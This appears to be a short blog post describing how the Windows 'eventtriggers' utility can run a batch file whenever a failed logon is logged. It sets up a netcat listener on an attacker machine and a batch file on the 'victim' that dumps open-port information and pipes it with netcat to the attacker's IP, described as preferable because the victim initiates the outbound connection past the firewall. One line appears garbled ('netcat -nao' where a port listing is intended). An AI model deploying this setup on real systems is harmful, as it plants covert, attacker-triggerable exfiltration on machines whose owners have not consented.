It would be an interesting concept to connect back to a server based on events logged. Triggering an email or sending a message based on a pre-configured condition is nothing new to network administration. In incident response, we need to consider this scenario as well. This little talked about command line utility can be configured to start an application, a script, or a network connection if needed.
Bob side configuration - http://www.youtube.com/watch?v=v0dajsHuL8M&feature=channel&list=UL
netcat listener for connection
nc -l -p 7331 > from_victim.txt
# the above command will listen for connection and redirect what it receives to a text file from_victim.txt
Alice side configuration ( victim ) - http://www.youtube.com/watch?v=r7ax5_3uT6U&feature=channel&list=UL
Enabled policy to log for failed logon events
Netcat installed on local machine
eventtriggers /create /tr "Victimizer" /t FAILUREAUDIT /l Security /tk programToRun.bat
programToRun.bat file contents:
netcat -nao > ports.txt
type ports.txt|nc <IP_Bob> <port_Bob>
del ports.txt
#the above code will trigger when Bob tries to connect to Alice's machine even though Bob does not know Alice's password and he does not want to know neither. A connection attempt with a wrong password is all he needs to receive Alice's port information. This is a preferable way to implement this since the connection is initiated by Alice's workstation. Bob not started the connection that might have been filtered by the firewall.
No comments:
Post a Comment